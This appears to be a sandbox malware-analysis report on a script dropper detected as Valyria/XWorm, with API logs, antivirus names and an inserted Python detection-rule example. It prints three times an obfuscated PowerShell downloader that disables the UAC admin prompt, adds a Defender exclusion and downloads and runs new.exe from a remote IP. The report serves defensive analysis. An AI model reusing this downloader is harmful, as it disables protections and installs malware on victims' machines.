base_address: 0x02514000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02516000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02518000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02519000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
cmdline powershell.exe -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
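Signature data like the cmdline entries above is most useful once it is turned into detection logic. The block below is an added example in Python, not something the report or the sample contains: it runs a small rule set over constructed process-creation events modelled on this report's process tree (mshta.exe 1188 spawning powershell.exe 2060). The mshta.exe parent PID, the trimmed PowerShell command line and the benign third event are assumptions added for the demonstration; the rule patterns come from the behaviours visible in the recorded command line: the ExecutionPolicy override, ConsentPromptBehaviorAdmin set to 0, the Add-MpPreference exclusion and the integer-array string obfuscation.

```python
"""Flag the behaviours recorded in this report from process-creation telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events modelled on the process tree in this report
# (mshta.exe 1188 -> powershell.exe 2060). The PowerShell command line is cut
# down to the fragments the rules key on; the parent PID 1000 of mshta.exe and
# the third, benign PowerShell event are assumptions added for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(1188, 1000, r"C:\Windows\System32\mshta.exe",
                 r'"C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\sample.hta'),
    ProcessEvent(2060, 1188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted '
                 r"function enAxnkDfhW(){Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft"
                 r"\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
                 r"Add-MpPreference -ExclusionPath $env:AppData;"
                 r"New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628))}"),
    ProcessEvent(2100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
]

# Command-line rules: rule name -> pattern matched against the raw command line.
CMDLINE_RULES = {
    # -ExecutionPolicy Unrestricted/Bypass on the command line defeats script policy.
    "powershell_executionpolicy_override": re.compile(r"-ExecutionPolicy\s+(?:Unrestricted|Bypass)", re.I),
    # ConsentPromptBehaviorAdmin = 0 is "elevate without prompting" for administrators.
    "uac_admin_prompt_disabled": re.compile(r"ConsentPromptBehaviorAdmin\s+-Value\s+0\b", re.I),
    # A Defender path exclusion added from a script is rarely legitimate.
    "defender_exclusion_added": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    # Arrays of four-to-six digit integers are the char-offset obfuscation seen in this sample.
    "char_array_string_obfuscation": re.compile(r"@\((?:\d{4,6},){3,}\d{4,6}\)"),
}

# Script hosts that should not normally launch PowerShell in a managed environment.
SCRIPT_HOSTS = ("\\mshta.exe", "\\wscript.exe", "\\cscript.exe")


def evaluate(events):
    """Return (pid, rule_name) pairs for every rule each event triggers."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Relationship rule: keyed on the parent image, not on the script text,
        # so it survives a re-obfuscated payload.
        if (parent is not None
                and parent.image.lower().endswith(SCRIPT_HOSTS)
                and e.image.lower().endswith("\\powershell.exe")):
            findings.append((e.pid, "script_host_spawns_powershell"))
        for name, rx in CMDLINE_RULES.items():
            if rx.search(e.cmdline):
                findings.append((e.pid, name))
    return findings


if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The parent/child rule fires on the process relationship rather than on the command line, which is why it is worth keeping even when the script changes. The command-line rules catch the individual behaviours and will also flag legitimate administration that uses the same cmdlets, so pair them with the parent check or an allow-list before alerting on them alone.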
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 210.56.13.114
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\new.exe
Process injection Process 1188 resumed a thread in remote process 2060
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2060
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
dead_host 210.56.13.114:80
Lionic Trojan.Script.Valyria.4!c
CTX vba.trojan.valyria
Skyhigh BehavesLike.HTML.Dropper.lx
McAfee HTA/Downloader.f
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
TrendMicro-HouseCall Backdoor.VBS.XWORM.YXEJUZ
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.7482
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/PS!8.1250D (TOPIS:E0:0P7JYgJNCDO)
Emsisoft VB:Trojan.Valyria.7482 (B)
DrWeb Trojan.Siggen29.56582
TrendMicro Backdoor.VBS.XWORM.YXEJUZ
Ikarus Trojan.VBS.Agent
FireEye VB:Trojan.Valyria.7482
Google Detected
Kingsoft Script.Trojan.Generic.a
Gridinsoft Malware.U.XWorm.tr
Microsoft Trojan:Script/Wacatac.B!ml
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
GData VB:Trojan.Valyria.7482
Tencent Script.Trojan.Generic.Rzfl
huorong Trojan/VBS.Starter.x
Fortinet VBS/Agent.QVR!tr
AVG Script:SNH-gen [Drp]
alibabacloud Trojan:Win/Valyria.Gen